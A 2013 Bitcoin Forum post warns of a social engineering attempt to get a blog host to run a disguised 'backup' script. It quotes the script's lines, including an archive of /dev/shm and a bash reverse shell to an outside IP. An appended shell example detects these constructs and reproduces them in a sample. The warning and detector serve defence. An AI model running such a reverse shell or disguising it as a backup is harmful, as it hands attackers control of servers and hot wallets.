Bitcoin Forum

Economy => Trading Discussion => Topic started by: MPOE-PR on June 09, 2013, 07:29:22 PM



Title: Social Engineering attack, probably Bitcoin-driven.
Post by: MPOE-PR on June 09, 2013, 07:29:22 PM
Mr P. was hit earlier today (http://polimedia.us/trilema/2013/in-the-interest-of-full-disclosure-failed-social-engineering-attempt-and-0day-vulnerability-in-betadesk/#comment-93505), to no actual effect.

While the attackers targeted his blog, the MO may have larger implications for the Bitcoin community, because the attacker was trying to get this (http://pastebin.com/asdWBEPB) script run on the server. The relevant part there is:

Quote
tar -cvzPf /root/$DIR/$DATE/$DATE-$SERVER-etc.tar.gz /dev/shm
echo "Uploading backed up data."
bash -i >& /dev/tcp/96.43.130.122/80 0>&1

which could perhaps compromise an Electrum wallet? (or more generally any hotwallet if /shm is sloppily being used).

This would be a good time for everyone running a hotwallet on a hosted/managed server to review their use of /shm, because you never know when an overworked entry level support person will just run a "back-up script" on your account.
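
An added example, not part of the original post or the linked script: a pre-run check a support person could apply to a script they are asked to execute, flagging the two constructs in the quoted lines (a /dev/tcp redirection and an archive of /dev/shm). The function names, the rule labels and the sample input are assumptions made for this illustration; the sample uses a documentation address rather than the one in the post.

```shell
#!/bin/sh
# Added example: static pre-run check for a script received from a third party.
# Rules (both taken from the constructs in the quoted snippet):
#   net-redirect  a /dev/tcp/HOST/PORT or /dev/udp/HOST/PORT path, which bash
#                 treats as a network socket when used in a redirection
#   shm-read      a copy/archive command whose arguments include /dev/shm
# Output: one "LINE:RULE:TEXT" per finding. Returns 0 clean, 1 findings, 2 unreadable.

review_script() {
    file=$1
    [ -r "$file" ] || { echo "cannot read: $file" >&2; return 2; }
    # Number the lines, drop whole-line comments so commented text is not flagged.
    body=$(grep -nEv '^[[:space:]]*#' "$file") || true
    net=$(printf '%s\n' "$body" |
        grep -E '/dev/(tcp|udp)/[^[:space:]/]+/[0-9]+' |
        sed 's/^\([0-9][0-9]*\):/\1:net-redirect:/')
    shm=$(printf '%s\n' "$body" |
        grep -E '(^[0-9]+:|[[:space:];|&])(tar|cp|rsync|zip|cat|scp)[[:space:]].*/dev/shm' |
        sed 's/^\([0-9][0-9]*\):/\1:shm-read:/')
    findings=$(printf '%s\n%s\n' "$net" "$shm" | grep -v '^$' | sort -t: -k1,1n)
    [ -n "$findings" ] || return 0
    printf '%s\n' "$findings"
    return 1
}

# Constructed sample input modelled on the quoted lines; 192.0.2.10 is a
# documentation address (RFC 5737), not the address from the post.
sample_script() {
    cat <<'EOF'
#!/bin/bash
# nightly backup
DATE=$(date +%F)
tar -cvzPf /root/$DIR/$DATE/$DATE-$SERVER-etc.tar.gz /dev/shm
echo "Uploading backed up data."
bash -i >& /dev/tcp/192.0.2.10/80 0>&1
EOF
}

# Demo run on the constructed sample.
tmp=$(mktemp)
sample_script > "$tmp"
review_script "$tmp" || echo "findings above: do not run before review"
rm -f "$tmp"
```

A clean result only means these literal forms are absent; an encoded or indirectly built command would not match, so the check supplements reading the script rather than replacing it.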